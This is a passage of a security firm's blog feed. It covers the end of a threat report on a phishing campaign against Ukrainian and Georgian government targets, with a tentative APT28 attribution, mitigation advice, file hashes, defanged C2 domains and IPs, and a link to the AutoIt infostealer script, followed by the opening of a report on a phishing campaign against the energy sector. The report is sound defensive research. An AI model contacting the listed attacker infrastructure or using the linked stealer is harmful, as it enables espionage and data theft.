&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig15.png" title="Process tree of 900e892c8151f0f59a93af1206583ce6" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Process tree of 900e892c8151f0f59a93af1206583ce6&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The file dropped from the C2 is a packed .NET file that loads the AutoIt
payload into memory.&lt;/p&gt;
&lt;h2&gt;Possible Russian Connection&lt;span class="hx:absolute hx:-mt-20" id="possible-russian-connection"&gt;&lt;/span&gt;
&lt;a href="#possible-russian-connection" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;We noticed similarities between this attack and Russia&amp;rsquo;s APT28 campaigns. While
these similarities alone are not enough to attribute APT28, victimology and
intent to conduct espionage on various government entities in Eastern European
regions gives us reason to believe that Russia is behind the attack.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Victimology: APT28 has targeted Ukraine and Georgia in the past. &lt;a href="https://www.cnbc.com/2014/10/28/russian-hackers-target-nato-military-secrets.html"target="_blank" rel="noopener"&gt;[1]&lt;/a&gt;&lt;a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"target="_blank" rel="noopener"&gt;[2]&lt;/a&gt;&lt;a href="https://securelist.com/greyenergys-overlap-with-zebrocy/89506/"target="_blank" rel="noopener"&gt;[3]&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Phishing theme: APT28 previously used COVID-19-related phishing themes to
target countries including Ukraine. APT28 also used NATO as a phishing theme
in the past. &lt;a href="https://www.cnbc.com/2014/10/28/russian-hackers-target-nato-military-secrets.html"target="_blank" rel="noopener"&gt;[1]&lt;/a&gt;&lt;a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"target="_blank" rel="noopener"&gt;[2]&lt;/a&gt;&lt;a href="https://intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"target="_blank" rel="noopener"&gt;[4]&lt;/a&gt;&lt;a href="https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/"target="_blank" rel="noopener"&gt;[5]&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Use of AutoIt: One of Zebrocy&amp;rsquo;s (malware from APT28) variants is written in
AutoIt. &lt;a href="https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"target="_blank" rel="noopener"&gt;[6]&lt;/a&gt;&lt;a href="https://vk-intel.org/2019/01/22/lets-learn-progression-of-apt28-autoit-zebrocy-downloaders-source-code-level-analysis/"target="_blank" rel="noopener"&gt;[7]&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;File search with predefined extensions: Zebrocy searches for predefined file
extensions on the victim machine. &lt;a href="https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"target="_blank" rel="noopener"&gt;[8]&lt;/a&gt;&lt;a href="https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/"target="_blank" rel="noopener"&gt;[9]&lt;/a&gt;&lt;a href="https://attack.mitre.org/software/S0251/"target="_blank" rel="noopener"&gt;[13]&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Compressed file holding both malicious and benign files was used in an APT28
COVID-19 phishing attack last year and in other campaigns in the past. &lt;a href="https://intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"target="_blank" rel="noopener"&gt;[4]&lt;/a&gt;&lt;a href="https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"target="_blank" rel="noopener"&gt;[8]&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Use of spear phishing emails containing URL-shortener was documented in past
APT28 campaigns. In one of the campaigns, this URL hosted a ZIP file
containing a benign PDF and a malicious executable. &lt;a href="https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"target="_blank" rel="noopener"&gt;[8]&lt;/a&gt;&lt;a href="https://www.justice.gov/opa/page/file/1098481/download"target="_blank" rel="noopener"&gt;[10]&lt;/a&gt;&lt;a href="https://www.justice.gov/file/1080281/download"target="_blank" rel="noopener"&gt;[11]&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Use of Hex encoding: The Zebrocy AutoIt version uses String to Hex encoding.
&lt;a href="https://vk-intel.org/2019/01/22/lets-learn-progression-of-apt28-autoit-zebrocy-downloaders-source-code-level-analysis/"target="_blank" rel="noopener"&gt;[7]&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Use of batch files, PowerShell and CMD are part of APT28&amp;rsquo;s documented TTPs.
&lt;a href="https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"target="_blank" rel="noopener"&gt;[8]&lt;/a&gt;&lt;a href="https://attack.mitre.org/groups/G0007/"target="_blank" rel="noopener"&gt;[12]&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Mitigation&lt;span class="hx:absolute hx:-mt-20" id="mitigation"&gt;&lt;/span&gt;
&lt;a href="#mitigation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Take the following precautions to keep your organization clean and safe from
phishing attacks.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Enhance social engineering awareness within your organization.&lt;/li&gt;
&lt;li&gt;Use an email gateway to analyze attachments and links. Intezer Analyze now
supports analysis for Microsoft Office documents, PDFs and scripts.&lt;/li&gt;
&lt;li&gt;Conduct proactive threat hunting on all endpoints inside your organization to
routinely ensure that no traces of malicious code or malware exist in-memory.
Intezer&amp;rsquo;s live Endpoint Scanner can help you achieve this at scale by
collecting all binaries running in-memory, including fileless, and
classifying them using Genetic Code Analysis technology. We also have a
&lt;a href="https://intezer.com/blog/malware-analysis/accelerate-incident-response-with-intezer-analyze-volatility-plugin/"target="_blank" rel="noopener"&gt;Volatility plugin&lt;/a&gt;
for analyzing memory dumps.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;AutoIt Payload Script&lt;span class="hx:absolute hx:-mt-20" id="autoit-payload-script"&gt;&lt;/span&gt;
&lt;a href="#autoit-payload-script" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The AutoIt script can be found in the following
&lt;a href="https://github.com/intezer/community-intellignce/blob/master/AutoIt_Infostealer_GE_UA.txt"target="_blank" rel="noopener"&gt;GitHub repository&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Delivery Files&lt;span class="hx:absolute hx:-mt-20" id="delivery-files"&gt;&lt;/span&gt;
&lt;a href="#delivery-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;RTF&lt;span class="hx:absolute hx:-mt-20" id="rtf"&gt;&lt;/span&gt;
&lt;a href="#rtf" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;a60f4a353ea89adc8def453c8a1e65ea2ecc46c64d0d9ea375ca4e85e1c428fd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;52173598ca2f4a023ec193261b0f65f57d9be3cb448cd6e2fcc0c8f3f15eaaf7&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2ec710d38a0919f9f472b220cfe8d554a30d24bfa4bdd90b96105cee842cf40d&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9803e65afa5b8eef0b6f7ced42ebd15f979889b791b8eadfc98e7f102853451a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;f357f9bf438f44b2029dfa12c03856393484f723b9df03ecde3e1ef03ddffcb7&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;DOC&lt;span class="hx:absolute hx:-mt-20" id="doc"&gt;&lt;/span&gt;
&lt;a href="#doc" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;0be1801a6c5ca473e2563b6b77e76167d88828e1347db4215b7a83e161dae67f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;96f815abb422bb75117e867384306a3f1b3625e48b81c44ebf032953deb2b3ff&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;LNK&lt;span class="hx:absolute hx:-mt-20" id="lnk"&gt;&lt;/span&gt;
&lt;a href="#lnk" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;101d9f3a9e4a8d0c8d80bcd40082e10ab71a7d45a04ab443ef8761dfad246ca5&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Ced5f53bafc5896be0a62ed5bdabed38a6224f8dcbe61669e833749ff62693dd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;ZIP&lt;span class="hx:absolute hx:-mt-20" id="zip"&gt;&lt;/span&gt;
&lt;a href="#zip" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;275388ffad3a1046087068a296a6060ed372d5d4ef6cf174f55c3b4ec7e8a0e8&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;A16e466bed46fcf9c0a771ca0e41bc42a1ac13e66717354e4824f61d1695dbb1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;47e1991f94309566e35ea57507c7c8d013103e860f12f2166450900e8179a75e&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;E39a12f34bb8a7a5a03fd23f351846088692e1248a3952e488102d3aea577644&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;677500881c64f4789025f46f3d0e853c00f2f41216eb2f2aaa1a6c59884b04cc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;5227adda2d80fb9b66110eeb26d57e69bbbb7bd681aecc3b1e882dc15e06be17&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;a856ae150144179848e0cc9be7618b4404c20c356eb93db490c8496ae2775b5e&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;CPL&lt;span class="hx:absolute hx:-mt-20" id="cpl"&gt;&lt;/span&gt;
&lt;a href="#cpl" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;10d21d4bf93e78a059a32b0210bd7891e349aabe88d0184d162c104b1e8bee2e&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0c644fedcb4298b705d24f2dee45dda0ae5dd6322d1607e342bcf1d42b59436c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0db336cab2ca69d630d6b7676e5eab86252673b1197b34cf4e3351807229f12a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;72f57b040d6f523afee40159a743b1ecae685a5bf939cab06b78d1fc397ec5e7&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;64057982a5874a9ccdb1b53fc15dd40f298eda2eb38324ac676329f5c81b64e0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;f4a56c86e2903d509ede20609182fbe001b3a3ca05f8c23c597189935d4f71b8&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;JS&lt;span class="hx:absolute hx:-mt-20" id="js"&gt;&lt;/span&gt;
&lt;a href="#js" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;5d9c7192cae28f4b6cc0463efe8f4361e449f87c2ad5e74a6192a0ad96525417&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fe49909fdd70192e3367d4d88458afbaf817e7a50acae199db97bd68358b241e&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;PDF&lt;span class="hx:absolute hx:-mt-20" id="pdf"&gt;&lt;/span&gt;
&lt;a href="#pdf" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;f69125eafdd54e1aae10707e0d95b0526e80b3b224f2b64f5f6d65485ca9e886&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Packed AutoIT Infostealer&lt;span class="hx:absolute hx:-mt-20" id="packed-autoit-infostealer"&gt;&lt;/span&gt;
&lt;a href="#packed-autoit-infostealer" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;cd93f6df63187e3ac31ea56339f9b859b0f4fbe3e73e1c07192cef4c9a6f8b08&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;4fdc37f59801976606849882095992efecee0931ece77d74015113123643796e&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2bef4a398a88749828afac59b773ae8b31c8e4e5b499aad516dd39ada1a11eca&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;d6e2a79bc87d48819fabe332dd3539f572605bb6091d34ae7d25ae0934b606b5&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;6ee2fd3994acdbb9a1b1680ccd3ac4b7dcb077b30b44c8677252202a03dccf79&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ea9e5ad0ef82af2c0c75c371e683352a781eb2260a45c584d70995edec956ce9&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0d83c1f7d2d7ea0e7fe144933bfa9dd314dae3937af714ea9274f43641756060&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;4d59a7739f15c17f144587762447d5abb81c01f16224a3f7ce5897d1b6f7ee77&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;39e8455d21447e32141dc064eb7504c6925f823bf6d9c8ce004d44cb8facc80b&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cb4a93864a19fc14c1e5221912f8e7f409b5b8d835f1b3acc3712b80e4a909f1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b72188ba545ad865eb34954afbbdf2c9e8ebc465a87c5122cebb711f41005939&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;005d2d373e7ba5ee42010870b9f9bf829213a42b2dd3c4f3f4405c8b904641f2&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ba4b321bf2bc542d9e9bcfcf54bc98335acd0b27a5e5851f4667e6b23d968a04&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b0b4550ba09080e02c8a15cec8b5aeaa9fbb193cec1d92c793bdede78a70cec6&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;a9a89bb76c6f06277b729bc2de5e1aaef05fc0d9675edbc0895c7591c35f17eb&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bd83e801b836906bab4854351b4d6000e0a435736524a504b9839b5f7bdf97cc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;3075a467e89643d1f37e9413a2b38328fbec4dd1717ae57128fdf1da2fe39819&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;8ab3879ed4b1601feb0de11637c9c4d1baeb5266f399d822f565299e5c1cd0c4&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b83c41763b5e861e15614d3d6ab8573c7948bf176143ee4142516e9b8bcb4423&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0222f6bdfd21c41650bcb056f618ee9e4724e722b3abcd8731b92a99167c6f8d&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b02c420e6f8a977cd254cd69281a7e8ce8026bda3fc594e1fc550c3b5e41565d&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;6a698edb366f25f156e4b481639903d816c5f5525668f65e2c097ef682afc269&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9ee1a587acaddb45481aebd5778a6c293fe94f70fe89b4961098eb7ba32624a8&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2762cbc81056348f2816de01e93d43398ba65354252c97928a56031e32ec776f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;476ee9c0b7f7f864b169f0d1beb1a3bbcc7dbab1bae7d7f77ee69e22ad25ff66&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;df3b1ad5445d628c24c1308aa6cb476bd9a06f0095a2b285927964339866b2c3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;26ce818e64caf89d795861db0c84a59e42428bd99b381feb53cb05a67ec69c07&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ff07325f5454c46e883fefc7106829f75c27e3aaf312eb3ab50525faba51c23c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;494122ff204f3dedaa8f0027f9f98971b32c50acbcce4efa8de0498efa148365&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7419f0798c70888e7197f69ed1091620b2c6fbefead086b5faf23badf0474044&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ec62c984941954f0eb4f3e8baee455410a9dc0deb222360d376e28981c53b1a0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;56731c777896837782beff4432330486a941e4f3af44b4d24be7c62c16e96256&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0f7a8611deea696b2b36e44ea652c8979e296b623e841796a4ea4b6916b39e7c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;975f9ce0769a079e99f06870122e9c4d394dfd51a6020818feeef9ccdb8b0614&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0f19735f076a42396b9f41b10c314d094a54e0e647f2cf7a2c025da8f8e9f54e&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9917c962b7e0a36592c4740d193adbd31bc1eae748d2b441e77817d648487cff&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;f24ee966ef2dd31204b900b5c7eb7e367bc18ff92a13422d800c25dbb1de1e99&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7eb1dc1719f0918828cc8349ee56ca5e6bbde7cada3bc67a11d7ff7f420c7871&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;71e9cc55f159f2cec96de4f15b3c94c2b076f97d5d8cecb60b8857e7a8113a35&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;afdc010fc134b0b4a8b8788d084c6b0cff9ea255d84032571e038f1a29b56d0a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9528a97d8d73b0dbed2ac496991f0a2eecc5a857d22e994d227ae7c3bef7296f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0fc7154ebd80ea5d81d82e3a4920cb2699a8dd7c31100ca8ec0693a7bd4af8b7&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2d9d61ce6c01329808db1ca466c1c5fbf405e4e869ed04c59f0e45d7ad12f25b&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9ef2d114c329c169e7b62f89a02d3f7395cb487fcd6cff4e7cac1eb198407ba6&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b2f5edef0e599005e205443b20f6ffd9804681b260eec52fa2f7533622f46a6c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dfc24fa837b6cd3210e7ea0802db3dcf7bb1f85bff2c1b4bda4c3c599821bf8c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;27868ae50b849506121c36b00d92afe3115ce2f041cc28476db8dfc0cc1d6908&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7963f8606e4c0e7502a813969a04e1266e7cd20708bef19c338e8933c1b85eda&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;89da9a4a5c26b7818e5660b33941b45c8838fa7cfa15685adfe83ff84463799a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;187e0a02620b7775c2a8f88d5b27e80b5d419ad156afc50ef217a95547d0feaa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b24eac4c704502ee8952ad32384daec5894fd81d7bb668224730d4fb06293942&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2945393c74dd6d8de782e060362cdd468004ae2633bb4958c6063cd2fd5f5561&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;707971879e65cbd70fd371ae76767d3a7bff028b56204ca64f27e93609c8c473&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;37be3d8810959e63d5b6535164e51f16ccea9ca11d7dab7c1dfaa335affe6e3d&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;C33a905e513005cee9071ed10933b8e6a11be2335755660e3f7b2adf554f704a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0e1e2f87699a24d1d7b0d984c3622971028a0cafaf665c791c70215f76c7c8fe&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;C2&lt;span class="hx:absolute hx:-mt-20" id="c2"&gt;&lt;/span&gt;
&lt;a href="#c2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;9832473219412342343423243242364-34939246823743287468793247237[.]site&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;4895458025-4545445-222435-9635794543-3242314342-234123423728[.]space&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1221[.]site&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1681683130[.]website&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1833[.]site&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2215[.]site&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;2055[.]site&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;16868138130[.]space&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;33655990[.]cyou&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;16868138130[.]space&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;name4050[.]com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;name1d[.]site&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;000000027[.]xyz&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;coronavirus5g[.]site&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;99kg[.]site&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9348243249382479234343284324023432748892349702394023[.]xyz&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;15052021[.]space&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1000020[.]xyz&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;32689657[.]xyz&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1000018[.]xyz&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;32689658[.]xyz&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;45[.]146[.]165[.]91&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;31[.]42[.]185[.]63&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;194[.]58[.]112[.]173&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;194[.]147[.]142[.]232&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;176[.]113[.]115[.]133&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;References&lt;span class="hx:absolute hx:-mt-20" id="references"&gt;&lt;/span&gt;
&lt;a href="#references" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ol&gt;
&lt;li&gt;&lt;a href="https://www.cnbc.com/2014/10/28/russian-hackers-target-nato-military-secrets.html"target="_blank" rel="noopener"&gt;CNBC, Russian Hackers Target NATO, Military Secrets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"target="_blank" rel="noopener"&gt;FireEye, APT28: A Window Into Russia&amp;rsquo;s Cyber Espionage Operations?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://securelist.com/greyenergys-overlap-with-zebrocy/89506/"target="_blank" rel="noopener"&gt;Kaspersky, GreyEnergy&amp;rsquo;s Overlap with Zebrocy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"target="_blank" rel="noopener"&gt;Intezer, A Zebra in Gopher&amp;rsquo;s Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/"target="_blank" rel="noopener"&gt;Quointelligence, APT28 Delivers Zebrocy Malware Campaign using NATO Theme as Lure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"target="_blank" rel="noopener"&gt;ESET, Sednit Update: Analysis of Zebrocy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://vk-intel.org/2019/01/22/lets-learn-progression-of-apt28-autoit-zebrocy-downloaders-source-code-level-analysis/"target="_blank" rel="noopener"&gt;VK-Intel. Let&amp;rsquo;s Learn: Progression of APT28 AutoIt Zebrocy Downloaders: Source-Code Level Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"target="_blank" rel="noopener"&gt;ESET, A Journey to Zebrocy Land&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/"target="_blank" rel="noopener"&gt;ESET, Sednit: What&amp;rsquo;s Going on with Zebrocy?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.justice.gov/opa/page/file/1098481/download"target="_blank" rel="noopener"&gt;Brady, S. Indictment – United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.justice.gov/file/1080281/download"target="_blank" rel="noopener"&gt;Mueller, R. Indictment – United States of America vs. Viktor Borisovich Netyksho, et al. Retrieved September 13, 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://attack.mitre.org/groups/G0007/"target="_blank" rel="noopener"&gt;APT28 MITRE ATT&amp;amp;CK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://attack.mitre.org/software/S0251/"target="_blank" rel="noopener"&gt;Zebrocy MITRE ATT&amp;amp;CK&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;</description></item><item><title>Energy Sector and its Suppliers Targeted in Global Phishing Campaign</title><link>https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/</link><pubDate>Wed, 07 Jul 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/</guid><description>
&lt;p&gt;Our research team has found a sophisticated campaign, active for at least one
year, targeting large international companies in the energy, oil &amp;amp; gas, and
electronics industries. The attack also targets oil &amp;amp; gas suppliers, possibly
indicating that this is only the first stage in a wider campaign. In the event
of a successful breach, the attacker could use the compromised email account of
the receipt to send spear phishing emails to companies that work with the
supplier. Thus using the established reputation of the supplier to go after
more targeted entities.&lt;/p&gt;
&lt;p&gt;The attackers use typosquatted and spoofed emails to launch the attack. The
campaign spreads via phishing emails tailored to employees at each company
being targeted. The contents and sender of the emails are made to look like
they are being sent from another company in the relevant industry offering a
business partnership or opportunity. Each email has an attachment, usually an
